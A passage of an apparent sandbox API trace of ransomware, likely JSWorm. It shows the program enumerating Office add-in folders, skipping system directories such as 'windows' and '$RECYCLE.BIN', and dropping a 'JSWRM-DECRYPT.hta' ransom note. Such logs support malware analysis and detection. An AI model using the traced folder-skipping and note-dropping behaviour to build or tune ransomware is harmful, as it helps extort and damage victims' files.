RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0123.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONDIRECTX.DLL", cchWideChar=24, lpMultiByteStr=0x241358, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONDIRECTX.DLL", lpUsedDefaultChar=0x0) returned 24 [0123.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0123.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0123.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0123.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.604] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x613fd44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x613fd44, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd3c60, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONENGINE.DLL", cAlternateFileName="VI323F~1.DLL")) returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2=".") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="..") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="...") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="windows") returned -1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="recovery") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="perflogs") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="documents and settings") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="system volume information") returned 1 [0123.604] lstrcmpiW (lpString1="VISUALIZATIONENGINE.DLL", lpString2="msocache") returned 1 [0123.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONENGINE.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONENGINE.DLL", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONENGINE.DLL", lpUsedDefaultChar=0x0) returned 23 [0123.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONENGINE.DLL", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONENGINE.DLL", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONENGINE.DLL", lpUsedDefaultChar=0x0) returned 23 [0123.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0123.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0123.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.605] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd42fe2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd42fe2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30070, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="VISUALIZATIONGRAPHICS.DLL", cAlternateFileName="VIF07A~1.DLL")) returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2=".") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="..") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="...") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="windows") returned -1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="recovery") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="perflogs") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="documents and settings") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="system volume information") returned 1 [0123.605] lstrcmpiW (lpString1="VISUALIZATIONGRAPHICS.DLL", lpString2="msocache") returned 1 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONGRAPHICS.DLL", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONGRAPHICS.DLL", cchWideChar=25, lpMultiByteStr=0x241380, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONGRAPHICS.DLL", lpUsedDefaultChar=0x0) returned 25 [0123.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONGRAPHICS.DLL", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0123.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISUALIZATIONGRAPHICS.DLL", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISUALIZATIONGRAPHICS.DLL", lpUsedDefaultChar=0x0) returned 25 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0123.606] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x305f84a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x305f84a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36c7dee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15670, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="WPFEXTENSIONS.DLL", cAlternateFileName="WPFEXT~1.DLL")) returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2=".") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="..") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="...") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="windows") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="recovery") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="perflogs") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="documents and settings") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="system volume information") returned 1 [0123.606] lstrcmpiW (lpString1="WPFEXTENSIONS.DLL", lpString2="msocache") returned 1 [0123.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPFEXTENSIONS.DLL", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPFEXTENSIONS.DLL", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WPFEXTENSIONS.DLL", lpUsedDefaultChar=0x0) returned 17 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPFEXTENSIONS.DLL", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0123.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WPFEXTENSIONS.DLL", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WPFEXTENSIONS.DLL", lpUsedDefaultChar=0x0) returned 17 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0123.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.606] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x305f84a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x305f84a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x36c7dee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15670, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="WPFEXTENSIONS.DLL", cAlternateFileName="WPFEXT~1.DLL")) returned 0 [0123.607] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0123.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0123.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0123.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0123.607] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Power View Excel Add-in", cAlternateFileName="POWERV~1")) returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2=".") returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="..") returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="...") returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="windows") returned -1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="recovery") returned -1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="perflogs") returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="documents and settings") returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="$RECYCLE.BIN") returned 1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="system volume information") returned -1 [0123.607] lstrcmpiW (lpString1="Power View Excel Add-in", lpString2="msocache") returned 1 [0123.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0123.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0123.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0123.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0123.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0123.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0123.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\jswrm-decrypt.hta")) returned 0xffffffff [0123.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0123.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0123.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0123.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0123.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0123.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0123.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.611] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.611] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0123.612] CloseHandle (hObject=0x238) returned 1 [0123.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0123.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0123.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0123.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0123.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0123.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0123.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0123.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0123.612] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\jswrm-decrypt.hta")) returned 0x20 [0123.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0123.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0123.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0123.612] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40577766, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0123.612] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.612] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40577766, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0123.612] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.612] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.612] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x897b914, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x897b914, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc38b8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.612] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.612] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.613] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0123.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0123.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0123.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0123.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0123.613] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133cde53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0123.613] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0123.613] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0123.613] lstrcmpiW (lpString1="ar", lpString2="...") returned 1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="windows") returned -1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="recovery") returned -1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="perflogs") returned -1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="documents and settings") returned -1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="$RECYCLE.BIN") returned 1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="system volume information") returned -1 [0123.614] lstrcmpiW (lpString1="ar", lpString2="msocache") returned -1 [0123.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0123.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 